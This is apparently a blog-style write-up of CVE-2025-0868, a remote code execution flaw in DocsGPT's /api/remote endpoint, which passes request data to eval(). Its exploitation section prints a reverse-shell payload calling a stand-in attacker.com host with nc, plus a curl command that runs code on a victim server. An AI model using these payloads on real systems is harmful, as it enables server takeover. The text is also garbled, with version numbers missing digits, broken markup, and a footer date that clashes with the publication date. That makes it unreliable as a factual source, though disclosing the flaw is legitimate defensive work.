A critical vulnerability, CVE-2025-0868, has been found in DocsGPT, an open-source documentation assistant powered by LLMs. The flaw allows anyone to run arbitrary Python code remotely through the /api/remote endpoint. This bug impacts DocsGPT versions .8.1 through .12.. It happens because the developers used Python’s dangerous eval() function while parsing JSON, opening up a straight path for attackers to take over affected servers with ease.
Affected versions: DocsGPT .8.1 ≤ version ≤ .12.
- Vulnerable Component: /api/remote endpoint — improper JSON handling with eval()
What Happened?
The /api/remote endpoint in DocsGPT is supposed to accept JSON commands for processing. But, instead of using safe methods to parse the incoming data, the code used Python’s eval() function. This means any data sent to the endpoint gets executed as Python code — including malicious commands.
Why is eval() dangerous?
eval() will run whatever string you give it as real Python code. This is a well-known risk: if user input is passed to eval() without safety checks, you’re basically handing attackers the keys to your server.
Let’s take a look at a simplified version of the vulnerable code
# Vulnerable code at /api/remote handler
from flask import Flask, request
app = Flask(__name__)
@app.route('/api/remote', methods=['POST'])
def remote():
data = request.data.decode('utf-8')
# THIS IS THE BUG
payload = eval(data) # <-- Accepts and executes any code!
# do something with payload...
return "OK"
What’s wrong here?
- If you send a POST request to /api/remote with { "malicious": "code" }, the server will execute it as raw Python.
{"__import__('os').system('whoami')": None}
And the server will run the whoami command.
What should have been used instead?
Safe JSON parsing, like:
python
import json
payload = json.loads(data)
---
## Reference
Original Disclosure, Project Issue Trackers, and Details:
- DocsGPT GitHub Repository
- Security Advisory on GitHub
- Python Eval Security Risks
---
## Exploitation: Step-by-Step
Here’s how easy it is for an attacker to exploit the bug:
1. Find a vulnerable server:
Check if /api/remote exists and accepts POST requests.
2. Prepare the malicious payload:
The attacker crafts data that runs Python code — for example, to open a reverse shell:
python
{'__import__("os").system("nc attacker.com 4444 -e /bin/bash")': None}
`python
{'__import__("os").system("touch /tmp/hacked")': None}
`bash
curl -X POST http://victim-ip:500/api/remote -d "{'__import__(\"os\").system(\"touch /tmp/hacked\")': None}"
Result:
The vulnerable server executes the code: creates the /tmp/hacked file, proving code execution.
Update immediately:
Check the releases page and upgrade to the latest non-vulnerable version past .12..
payload = json.loads(data)
<br>- <b>Shield the endpoint:</b> <br> If you cannot patch, immediately restrict access to /api/remote using firewalls or API gateway rules.<br><br>---<br><br>## Conclusion<br><br><b>CVE-2025-0868 is a text-book example of why eval()` must never be used on user input. Attackers can trivially take over DocsGPT servers running versions .8.1 to .12.. Fixes are simple — update, patch, and always validate and safely handle input.
---
Stay safe!
For more technical write-ups and updates, watch the official DocsGPT security advisories.
---
*This post is original and summarizes current knowledge as of June 2024. Spread the word to your team!*
Timeline
Published on: 02/20/2025 12:15:10 UTC